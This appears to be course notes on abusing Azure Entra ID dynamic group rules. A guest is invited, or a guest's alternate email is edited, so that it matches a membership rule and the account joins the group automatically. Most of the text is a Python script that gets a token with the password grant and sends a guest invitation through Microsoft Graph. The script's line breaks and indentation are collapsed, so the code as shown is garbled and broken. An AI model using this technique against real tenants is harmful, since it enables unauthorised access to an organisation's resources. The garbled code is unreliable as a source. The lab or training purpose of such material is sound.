With dynamic groups, you can create rules based on user or device properties to automatically join them to a dynamic group. For example, an organization may add users to a particular group based on their userPrincipalName, department, mail etc. When a group membership rule is applied, all users and device attributes are evaluated for matches.
Guest invite abuse
Before joining a tenant as guest, if we can enumerate that a property (lets say email) is used in a rule, we can invite a guest with the email ID that matches rule rule.
After joining a tenant. Manage profile -> change alternative email that matches rule.
Example rule:
(user.otherMails -any (_-contains "string"))
Python script to invite a guest
# This script is a part of Attacking and Defending Azure - Beginner's Edition course by Altered Security# https://www.alteredsecurity.com/azureadlabimport http.clientimport jsonimport argparsedefget_access_token_with_username_password(client_id,tenant_id,username,password): scope ="openid profile offline_access https://graph.microsoft.com/.default"# Prepare the body for the POST request body =f"client_id={client_id}&grant_type=password&username={username}&password={password}&scope={scope}&client_info=1"# Prepare headers headers ={'Content-Type':'application/x-www-form-urlencoded',}# Send the request conn = http.client.HTTPSConnection("login.microsoftonline.com") conn.request("POST", f"/{tenant_id}/oauth2/v2.0/token", body, headers) response = conn.getresponse() data = response.read() conn.close()# Parse and print the access token token_response = json.loads(data)if"access_token"in token_response: access_token = token_response['access_token']print("[+] Access token acquired successfully.")return access_tokenelse:print(f"[-] Failed to acquire token: {token_response.get('error_description')}")returnNonedefinvite_guest(access_token,external_username_email):print("[+] Inviting user...")# Set up the connection to Microsoft Graph conn = http.client.HTTPSConnection("graph.microsoft.com")# Define the API endpoint endpoint ="/v1.0/invitations"# Define the headers, including the Authorization header with the provided access token headers ={'Authorization':f'Bearer {access_token}','Content-Type':'application/json'}# Define the body with the email of the guest and some additional optional parameters body ={"invitedUserEmailAddress": external_username_email,"inviteRedirectUrl":f"https://portal.azure.com",# Update this URL to the actual app redirect URL"sendInvitationMessage":True,# This will send the invite email to the user"invitedUserMessageInfo":{"customizedMessageBody":"You are invited to collaborate on DefCorp External project."# Update this message to your own message}}# Convert the body to a JSON string body_json = json.dumps(body)# Send the POST request to the Microsoft Graph API conn.request("POST", endpoint, body_json, headers)# Get the response from the server response = conn.getresponse()# Read the response data data = response.read()# Check if the request was successfulif response.status ==201:# Parse the response data invitation_data = json.loads(data) invitation_link = invitation_data.get("inviteRedeemUrl") object_id = invitation_data.get("invitedUser", {}).get("id")print("[+] User invited successfully.\n")print(f"Object ID: {object_id}")print(f"Invitation link: {invitation_link}")return invitation_linkelse:# Print the error message if the request failedprint("[-] Failed to invite user.")print(f"[-] Error {response.status}: {data.decode('utf-8')}")returnNonedefmain(): parser = argparse.ArgumentParser(description='Azure AD B2B Guest Invitation Script')# Add option to input external user email via argument parser.add_argument('--external-user', type=str, help='External user email to invite')# Parse command-line arguments args = parser.parse_args()if args.external_user: external_username_email = args.external_userelse: external_username_email ="my-email@xx.onmicrosoft.com"# Add your own user email here.ifnot external_username_email:raiseValueError("External user email not provided")# Example usage client_id ="04b07795-8ddb-461a-bbee-xxx"# Public Client ID for Az CLI tenant_id ="b6e0615d-2c17-46b3-922c-xx"# Tenant ID of DefCorp IT username ="xx@xx.onmicrosoft.com" password =r"Password"# Get the access token using the username and password access_token =get_access_token_with_username_password(client_id, tenant_id, username, password)if access_token:invite_guest(access_token, external_username_email)else:print("[-] Failed to get access token.")exit()if__name__=='__main__':main()